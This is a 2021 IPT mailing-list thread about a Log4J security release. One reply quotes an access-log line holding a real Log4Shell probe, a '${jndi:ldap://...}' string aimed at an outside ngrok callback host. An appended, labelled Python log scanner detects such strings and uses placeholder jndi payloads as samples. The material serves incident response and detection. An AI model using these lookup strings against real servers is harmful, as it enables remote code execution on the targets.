[IPT] IPT security update (Log4J / Log4Shell exploit)

Julien Cigar julien at perdition.city
Mon Dec 13 13:14:56 UTC 2021


Hi Matthew,

As we've several hosted IPTs I upgraded immediately but after checking
the logs it looks like it wasn't fast enough:

logging% bzgrep 'jndi' http-access.log.*|grep 'ipt'             
http-access.log.1.bz2:Dec 11 17:04:39 router1 haproxy[14902]: 185.220.101.130 - - [11/Dec/2021:16:04:36 +0000] "GET /$%7Bjndi:ldap://c52a-146-56-186-40.ngrok.io/google%7D HTTP/1.1" 200 169114 "$#7Bjndi:ldap://c52a-146-56-186-40.ngrok.io/google#7D" "$#7Bjndi:ldap://c52a-146-56-186-40.ngrok.io/google#7D" "ipt.biodiversity.aq" 

Our ipts are hosted in dedicated (FreeBSD) jails and I haven't noticed
something suspicious.. but is there anything that I should check for
specifically?

Thanks,
Julien


On Sat, Dec 11, 2021 at 10:55:35AM +0100, Matthew Blissett wrote:
> Dear IPT users,
> 
> We have released a new version of the IPT, version 2.5.4 [1]. This version
> contains fixes to critical security issues with the Struts and Log4J[2]
> libraries.
> 
> According to the press [3], the problem with the Log4J library vulnerability
> is being exploited by malicious users — and I can already see queries
> containing "jndi" in the web server logs for the IPTs GBIF hosts at
> cloud.gbif.org, although they are random attempts and would not succeed.
> 
> All users are highly encouraged to upgrade to this version as soon as
> possible.
> 
> As usual, upgrade and installation instructions are in the manual [1].
> Please remember to check your data directory backup is working before
> starting the upgrade.
> 
> [1] https://ipt.gbif.org/manual/en/ipt/2.5/releases#2-5-4-december-2021
> 
> [2] https://www.lunasec.io/docs/blog/log4j-zero-day/
> 
> [3] https://www.theguardian.com/technology/2021/dec/10/software-flaw-most-critical-vulnerability-log-4-shell
> 
> Best regards,
> 
> Matthew

-- 
Julien Cigar
Belgian Biodiversity Platform (http://www.biodiversity.be)
PGP fingerprint: EEF9 F697 4B68 D275 7B11  6A25 B2BB 3710 A204 23C0
No trees were killed in the creation of this message.
However, many electrons were terribly inconvenienced.
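
Added example, not part of the original message or of the IPT project: a Python scan of haproxy-style access logs in the layout quoted above. It decodes the `%7B` and `#7B` brace forms, finds plain `${jndi:...}` strings in the request, referer and user-agent fields, and lists the callback hosts they name. The sample lines, addresses and host names are constructed placeholders, and `scan`, `normalise` and `vhost_filter` are names assumed here.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in the layout of the log line quoted above;
# addresses and host names are documentation placeholders, not real indicators.
SAMPLE = [
    'Dec 11 17:04:39 router1 haproxy[14902]: 192.0.2.10 - - [11/Dec/2021:16:04:36 +0000] '
    '"GET /$%7Bjndi:ldap://callback.example.net/a%7D HTTP/1.1" 200 169114 '
    '"$#7Bjndi:ldap://callback.example.net/a#7D" "$#7Bjndi:ldap://callback.example.net/a#7D" '
    '"ipt.example.org"',
    'Dec 11 17:05:02 router1 haproxy[14902]: 198.51.100.7 - - [11/Dec/2021:16:05:01 +0000] '
    '"GET /resource?r=birds HTTP/1.1" 200 5120 "-" "Mozilla/5.0" "ipt.example.org"',
    'Dec 11 17:06:11 router1 haproxy[14902]: 203.0.113.5 - - [11/Dec/2021:16:06:10 +0000] '
    '"GET / HTTP/1.1" 404 312 "-" "$#7Bjndi:dns://probe.example.com#7D" "www.example.org"',
]

LINE = re.compile(
    r'(?P<src>\S+) - - \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)" "(?P<vhost>[^"]*)"')
JNDI = re.compile(r'\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^/:}\s"]+)', re.I)

def normalise(field):
    """Undo the two encodings seen in the quoted line: %7B in the URL, #7B in headers."""
    return unquote(re.sub(r'#([0-9A-Fa-f]{2})', r'%\1', field))

def scan(lines, vhost_filter=None):
    """Return one record per log line carrying a plain ${jndi:...} lookup string."""
    hits = []
    for line in lines:
        m = LINE.search(line)
        if not m or (vhost_filter and vhost_filter not in m['vhost']):
            continue
        found = {f: JNDI.search(normalise(m[f])) for f in ('request', 'referer', 'agent')}
        found = {f: j for f, j in found.items() if j}
        if found:
            hits.append({
                'src': m['src'], 'time': m['ts'], 'vhost': m['vhost'],
                'status': int(m['status']),          # HTTP result only, not proof of a lookup
                'fields': sorted(found),
                'callbacks': sorted({f"{j['scheme'].lower()}://{j['host'].lower()}"
                                     for j in found.values()}),
            })
    return hits

if __name__ == '__main__':
    for hit in scan(SAMPLE, vhost_filter='ipt'):
        print(hit)
```

The callback hosts it returns are the names to search for in outbound connection or DNS logs of the host running the IPT. The HTTP status in the access log says nothing by itself about whether a lookup was performed.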